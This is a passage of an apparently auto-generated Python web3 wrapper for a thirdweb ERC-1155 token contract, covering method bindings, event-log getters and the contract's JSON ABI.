"""Constructor-initialized instance of
:class:`PlatformFeeBpsMethod`.
"""
platform_fee_recipient: PlatformFeeRecipientMethod
"""Constructor-initialized instance of
:class:`PlatformFeeRecipientMethod`.
"""
primary_sale_recipient: PrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`PrimarySaleRecipientMethod`.
"""
renounce_role: RenounceRoleMethod
"""Constructor-initialized instance of
:class:`RenounceRoleMethod`.
"""
revoke_role: RevokeRoleMethod
"""Constructor-initialized instance of
:class:`RevokeRoleMethod`.
"""
royalty_info: RoyaltyInfoMethod
"""Constructor-initialized instance of
:class:`RoyaltyInfoMethod`.
"""
safe_batch_transfer_from: SafeBatchTransferFromMethod
"""Constructor-initialized instance of
:class:`SafeBatchTransferFromMethod`.
"""
safe_transfer_from: SafeTransferFromMethod
"""Constructor-initialized instance of
:class:`SafeTransferFromMethod`.
"""
sale_recipient_for_token: SaleRecipientForTokenMethod
"""Constructor-initialized instance of
:class:`SaleRecipientForTokenMethod`.
"""
set_approval_for_all: SetApprovalForAllMethod
"""Constructor-initialized instance of
:class:`SetApprovalForAllMethod`.
"""
set_contract_uri: SetContractUriMethod
"""Constructor-initialized instance of
:class:`SetContractUriMethod`.
"""
set_default_royalty_info: SetDefaultRoyaltyInfoMethod
"""Constructor-initialized instance of
:class:`SetDefaultRoyaltyInfoMethod`.
"""
set_owner: SetOwnerMethod
"""Constructor-initialized instance of
:class:`SetOwnerMethod`.
"""
set_platform_fee_info: SetPlatformFeeInfoMethod
"""Constructor-initialized instance of
:class:`SetPlatformFeeInfoMethod`.
"""
set_primary_sale_recipient: SetPrimarySaleRecipientMethod
"""Constructor-initialized instance of
:class:`SetPrimarySaleRecipientMethod`.
"""
set_royalty_info_for_token: SetRoyaltyInfoForTokenMethod
"""Constructor-initialized instance of
:class:`SetRoyaltyInfoForTokenMethod`.
"""
supports_interface: SupportsInterfaceMethod
"""Constructor-initialized instance of
:class:`SupportsInterfaceMethod`.
"""
symbol: SymbolMethod
"""Constructor-initialized instance of
:class:`SymbolMethod`.
"""
thirdweb_fee: ThirdwebFeeMethod
"""Constructor-initialized instance of
:class:`ThirdwebFeeMethod`.
"""
total_supply: TotalSupplyMethod
"""Constructor-initialized instance of
:class:`TotalSupplyMethod`.
"""
uri: UriMethod
"""Constructor-initialized instance of
:class:`UriMethod`.
"""
verify: VerifyMethod
"""Constructor-initialized instance of
:class:`VerifyMethod`.
"""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
validator: TokenERC1155Validator = None,
):
"""Get an instance of wrapper for smart contract.
:param web3_or_provider: Either an instance of `web3.Web3`:code: or
`web3.providers.base.BaseProvider`:code:
:param contract_address: where the contract has been deployed
:param validator: for validation of method inputs.
"""
# pylint: disable=too-many-statements
self.contract_address = contract_address
if not validator:
validator = TokenERC1155Validator(
web3_or_provider, contract_address
)
web3 = None
if isinstance(web3_or_provider, BaseProvider):
web3 = Web3(web3_or_provider)
elif isinstance(web3_or_provider, Web3):
web3 = web3_or_provider
else:
raise TypeError(
"Expected parameter 'web3_or_provider' to be an instance of either"
+ " Web3 or BaseProvider"
)
# if any middleware was imported, inject it
try:
MIDDLEWARE
except NameError:
pass
else:
try:
for middleware in MIDDLEWARE:
web3.middleware_onion.inject(
middleware["function"],
layer=middleware["layer"],
)
except ValueError as value_error:
if value_error.args == (
"You can't add the same un-named instance twice",
):
pass
self._web3_eth = web3.eth
functions = self._web3_eth.contract(
address=to_checksum_address(contract_address),
abi=TokenERC1155.abi(),
).functions
self.default_admin_role = DefaultAdminRoleMethod(
web3_or_provider, contract_address, functions.DEFAULT_ADMIN_ROLE
)
self.balance_of = BalanceOfMethod(
web3_or_provider, contract_address, functions.balanceOf, validator
)
self.balance_of_batch = BalanceOfBatchMethod(
web3_or_provider,
contract_address,
functions.balanceOfBatch,
validator,
)
self.burn = BurnMethod(
web3_or_provider, contract_address, functions.burn, validator
)
self.burn_batch = BurnBatchMethod(
web3_or_provider, contract_address, functions.burnBatch, validator
)
self.contract_type = ContractTypeMethod(
web3_or_provider, contract_address, functions.contractType
)
self.contract_uri = ContractUriMethod(
web3_or_provider, contract_address, functions.contractURI
)
self.contract_version = ContractVersionMethod(
web3_or_provider, contract_address, functions.contractVersion
)
self.get_default_royalty_info = GetDefaultRoyaltyInfoMethod(
web3_or_provider, contract_address, functions.getDefaultRoyaltyInfo
)
self.get_platform_fee_info = GetPlatformFeeInfoMethod(
web3_or_provider, contract_address, functions.getPlatformFeeInfo
)
self.get_role_admin = GetRoleAdminMethod(
web3_or_provider,
contract_address,
functions.getRoleAdmin,
validator,
)
self.get_role_member = GetRoleMemberMethod(
web3_or_provider,
contract_address,
functions.getRoleMember,
validator,
)
self.get_role_member_count = GetRoleMemberCountMethod(
web3_or_provider,
contract_address,
functions.getRoleMemberCount,
validator,
)
self.get_royalty_info_for_token = GetRoyaltyInfoForTokenMethod(
web3_or_provider,
contract_address,
functions.getRoyaltyInfoForToken,
validator,
)
self.grant_role = GrantRoleMethod(
web3_or_provider, contract_address, functions.grantRole, validator
)
self.has_role = HasRoleMethod(
web3_or_provider, contract_address, functions.hasRole, validator
)
self.initialize = InitializeMethod(
web3_or_provider, contract_address, functions.initialize, validator
)
self.is_approved_for_all = IsApprovedForAllMethod(
web3_or_provider,
contract_address,
functions.isApprovedForAll,
validator,
)
self.is_trusted_forwarder = IsTrustedForwarderMethod(
web3_or_provider,
contract_address,
functions.isTrustedForwarder,
validator,
)
self.mint_to = MintToMethod(
web3_or_provider, contract_address, functions.mintTo, validator
)
self.mint_with_signature = MintWithSignatureMethod(
web3_or_provider,
contract_address,
functions.mintWithSignature,
validator,
)
self.multicall = MulticallMethod(
web3_or_provider, contract_address, functions.multicall, validator
)
self.name = NameMethod(
web3_or_provider, contract_address, functions.name
)
self.next_token_id_to_mint = NextTokenIdToMintMethod(
web3_or_provider, contract_address, functions.nextTokenIdToMint
)
self.owner = OwnerMethod(
web3_or_provider, contract_address, functions.owner
)
self.platform_fee_bps = PlatformFeeBpsMethod(
web3_or_provider, contract_address, functions.platformFeeBps
)
self.platform_fee_recipient = PlatformFeeRecipientMethod(
web3_or_provider, contract_address, functions.platformFeeRecipient
)
self.primary_sale_recipient = PrimarySaleRecipientMethod(
web3_or_provider, contract_address, functions.primarySaleRecipient
)
self.renounce_role = RenounceRoleMethod(
web3_or_provider,
contract_address,
functions.renounceRole,
validator,
)
self.revoke_role = RevokeRoleMethod(
web3_or_provider, contract_address, functions.revokeRole, validator
)
self.royalty_info = RoyaltyInfoMethod(
web3_or_provider,
contract_address,
functions.royaltyInfo,
validator,
)
self.safe_batch_transfer_from = SafeBatchTransferFromMethod(
web3_or_provider,
contract_address,
functions.safeBatchTransferFrom,
validator,
)
self.safe_transfer_from = SafeTransferFromMethod(
web3_or_provider,
contract_address,
functions.safeTransferFrom,
validator,
)
self.sale_recipient_for_token = SaleRecipientForTokenMethod(
web3_or_provider,
contract_address,
functions.saleRecipientForToken,
validator,
)
self.set_approval_for_all = SetApprovalForAllMethod(
web3_or_provider,
contract_address,
functions.setApprovalForAll,
validator,
)
self.set_contract_uri = SetContractUriMethod(
web3_or_provider,
contract_address,
functions.setContractURI,
validator,
)
self.set_default_royalty_info = SetDefaultRoyaltyInfoMethod(
web3_or_provider,
contract_address,
functions.setDefaultRoyaltyInfo,
validator,
)
self.set_owner = SetOwnerMethod(
web3_or_provider, contract_address, functions.setOwner, validator
)
self.set_platform_fee_info = SetPlatformFeeInfoMethod(
web3_or_provider,
contract_address,
functions.setPlatformFeeInfo,
validator,
)
self.set_primary_sale_recipient = SetPrimarySaleRecipientMethod(
web3_or_provider,
contract_address,
functions.setPrimarySaleRecipient,
validator,
)
self.set_royalty_info_for_token = SetRoyaltyInfoForTokenMethod(
web3_or_provider,
contract_address,
functions.setRoyaltyInfoForToken,
validator,
)
self.supports_interface = SupportsInterfaceMethod(
web3_or_provider,
contract_address,
functions.supportsInterface,
validator,
)
self.symbol = SymbolMethod(
web3_or_provider, contract_address, functions.symbol
)
self.thirdweb_fee = ThirdwebFeeMethod(
web3_or_provider, contract_address, functions.thirdwebFee
)
self.total_supply = TotalSupplyMethod(
web3_or_provider,
contract_address,
functions.totalSupply,
validator,
)
self.uri = UriMethod(
web3_or_provider, contract_address, functions.uri, validator
)
self.verify = VerifyMethod(
web3_or_provider, contract_address, functions.verify, validator
)
def get_approval_for_all_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for ApprovalForAll event.
:param tx_hash: hash of transaction emitting ApprovalForAll event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.ApprovalForAll()
.processReceipt(tx_receipt)
)
def get_default_royalty_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for DefaultRoyalty event.
:param tx_hash: hash of transaction emitting DefaultRoyalty event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.DefaultRoyalty()
.processReceipt(tx_receipt)
)
def get_owner_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for OwnerUpdated event.
:param tx_hash: hash of transaction emitting OwnerUpdated event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.OwnerUpdated()
.processReceipt(tx_receipt)
)
def get_platform_fee_info_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for PlatformFeeInfoUpdated event.
:param tx_hash: hash of transaction emitting PlatformFeeInfoUpdated
event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.PlatformFeeInfoUpdated()
.processReceipt(tx_receipt)
)
def get_primary_sale_recipient_updated_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for PrimarySaleRecipientUpdated event.
:param tx_hash: hash of transaction emitting
PrimarySaleRecipientUpdated event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.PrimarySaleRecipientUpdated()
.processReceipt(tx_receipt)
)
def get_role_admin_changed_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleAdminChanged event.
:param tx_hash: hash of transaction emitting RoleAdminChanged event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoleAdminChanged()
.processReceipt(tx_receipt)
)
def get_role_granted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleGranted event.
:param tx_hash: hash of transaction emitting RoleGranted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoleGranted()
.processReceipt(tx_receipt)
)
def get_role_revoked_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoleRevoked event.
:param tx_hash: hash of transaction emitting RoleRevoked event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoleRevoked()
.processReceipt(tx_receipt)
)
def get_royalty_for_token_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for RoyaltyForToken event.
:param tx_hash: hash of transaction emitting RoyaltyForToken event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.RoyaltyForToken()
.processReceipt(tx_receipt)
)
def get_tokens_minted_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TokensMinted event.
:param tx_hash: hash of transaction emitting TokensMinted event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TokensMinted()
.processReceipt(tx_receipt)
)
def get_tokens_minted_with_signature_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TokensMintedWithSignature event.
:param tx_hash: hash of transaction emitting TokensMintedWithSignature
event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TokensMintedWithSignature()
.processReceipt(tx_receipt)
)
def get_transfer_batch_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TransferBatch event.
:param tx_hash: hash of transaction emitting TransferBatch event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TransferBatch()
.processReceipt(tx_receipt)
)
def get_transfer_single_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for TransferSingle event.
:param tx_hash: hash of transaction emitting TransferSingle event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.TransferSingle()
.processReceipt(tx_receipt)
)
def get_uri_event(
self, tx_hash: Union[HexBytes, bytes]
) -> Tuple[AttributeDict]:
"""Get log entry for URI event.
:param tx_hash: hash of transaction emitting URI event
"""
tx_receipt = self._web3_eth.getTransactionReceipt(tx_hash)
return (
self._web3_eth.contract(
address=to_checksum_address(self.contract_address),
abi=TokenERC1155.abi(),
)
.events.URI()
.processReceipt(tx_receipt)
)
@staticmethod
def abi():
"""Return the ABI to the underlying contract."""
return json.loads(
'[{"inputs":[{"internalType":"address","name":"_thirdwebFee","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"newRoyaltyRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"newRoyaltyBps","type":"uint256"}],"name":"DefaultRoyalty","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"prevOwner","type":"address"},{"indexed":false,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnerUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"platformFeeRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"platformFeeBps","type":"uint256"}],"name":"PlatformFeeInfoUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"recipient","type":"address"}],"name":"PrimarySaleRecipientUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"previousAdminRole","type":"bytes32"},{"indexed":true,"internalType":"bytes32","name":"newAdminRole","type":"bytes32"}],"name":"RoleAdminChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleGranted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"},{"indexed":false,"internalType":"address","name":"royaltyRecipient","type":"address"},{"indexed":false,"internalType":"uint256","name":"royaltyBps","type":"uint256"}],"name":"RoyaltyForToken","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenIdMinted","type":"uint256"},{"indexed":false,"internalType":"string","name":"uri","type":"string"},{"indexed":false,"internalType":"uint256","name":"quantityMinted","type":"uint256"}],"name":"TokensMinted","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"signer","type":"address"},{"indexed":true,"internalType":"address","name":"mintedTo","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenIdMinted","type":"uint256"},{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"royaltyRecipient","type":"address"},{"internalType":"uint256","name":"royaltyBps","type":"uint256"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"string","name":"uri","type":"string"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"pricePerToken","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"indexed":false,"internalType":"struct ITokenERC1155.MintRequest","name":"mintRequest","type":"tuple"}],"name":"TokensMintedWithSignature","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256[]","name":"ids","type":"uint256[]"},{"indexed":false,"internalType":"uint256[]","name":"values","type":"uint256[]"}],"name":"TransferBatch","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"id","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"TransferSingle","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"value","type":"string"},{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"}],"name":"URI","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256[]","name":"ids","type":"uint256[]"}],"name":"balanceOfBatch","outputs":[{"internalType":"uint256[]","name":"","type":"uint256[]"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256[]","name":"ids","type":"uint256[]"},{"internalType":"uint256[]","name":"values","type":"uint256[]"}],"name":"burnBatch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractType","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"contractVersion","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"getDefaultRoyaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getPlatformFeeInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"getRoyaltyInfoForToken","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_defaultAdmin","type":"address"},{"internalType":"string","name":"_name","type":"string"},{"internalType":"string","name":"_symbol","type":"string"},{"internalType":"string","name":"_contractURI","type":"string"},{"internalType":"address[]","name":"_trustedForwarders","type":"address[]"},{"internalType":"address","name":"_primarySaleRecipient","type":"address"},{"internalType":"address","name":"_royaltyRecipient","type":"address"},{"internalType":"uint128","name":"_royaltyBps","type":"uint128"},{"internalType":"uint128","name":"_platformFeeBps","type":"uint128"},{"internalType":"address","name":"_platformFeeRecipient","type":"address"}],"name":"initialize","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"forwarder","type":"address"}],"name":"isTrustedForwarder","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"string","name":"_uri","type":"string"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"mintTo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"royaltyRecipient","type":"address"},{"internalType":"uint256","name":"royaltyBps","type":"uint256"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"string","name":"uri","type":"string"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"pricePerToken","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct ITokenERC1155.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"mintWithSignature","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"bytes[]","name":"data","type":"bytes[]"}],"name":"multicall","outputs":[{"internalType":"bytes[]","name":"results","type":"bytes[]"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"nextTokenIdToMint","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"platformFeeBps","outputs":[{"internalType":"uint128","name":"","type":"uint128"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"platformFeeRecipient","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"primarySaleRecipient","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"uint256","name":"salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"receiver","type":"address"},{"internalType":"uint256","name":"royaltyAmount","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256[]","name":"ids","type":"uint256[]"},{"internalType":"uint256[]","name":"amounts","type":"uint256[]"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeBatchTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"id","type":"uint256"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index_0","type":"uint256"}],"name":"saleRecipientForToken","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_uri","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_royaltyRecipient","type":"address"},{"internalType":"uint256","name":"_royaltyBps","type":"uint256"}],"name":"setDefaultRoyaltyInfo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_newOwner","type":"address"}],"name":"setOwner","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_platformFeeRecipient","type":"address"},{"internalType":"uint256","name":"_platformFeeBps","type":"uint256"}],"name":"setPlatformFeeInfo","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_saleRecipient","type":"address"}],"name":"setPrimarySaleRecipient","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"address","name":"_recipient","type":"address"},{"internalType":"uint256","name":"_bps","type":"uint256"}],"name":"setRoyaltyInfoForToken","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"thirdwebFee","outputs":[{"internalType":"contract ITWFee","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index_0","type":"uint256"}],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"uri","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"components":[{"internalType":"address","name":"to","type":"address"},{"internalType":"address","name":"royaltyRecipient","type":"address"},{"internalType":"uint256","name":"royaltyBps","type":"uint256"},{"internalType":"address","name":"primarySaleRecipient","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"string","name":"uri","type":"string"},{"internalType":"uint256","name":"quantity","type":"uint256"},{"internalType":"uint256","name":"pricePerToken","type":"uint256"},{"internalType":"address","name":"currency","type":"address"},{"internalType":"uint128","name":"validityStartTimestamp","type":"uint128"},{"internalType":"uint128","name":"validityEndTimestamp","type":"uint128"},{"internalType":"bytes32","name":"uid","type":"bytes32"}],"internalType":"struct ITokenERC1155.MintRequest","name":"_req","type":"tuple"},{"internalType":"bytes","name":"_signature","type":"bytes"}],"name":"verify","outputs":[{"internalType":"bool","name":"","type":"bool"},{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]' # noqa: E501 (line-too-long)
)
# pylint: disable=too-many-lines
| 38.185083
| 17,681
| 0.640738
| 18,526
| 179,699
| 5.942783
| 0.024722
| 0.075207
| 0.04269
| 0.040982
| 0.885573
| 0.85152
| 0.818431
| 0.795651
| 0.786041
| 0.726984
| 0
| 0.006738
| 0.245166
| 179,699
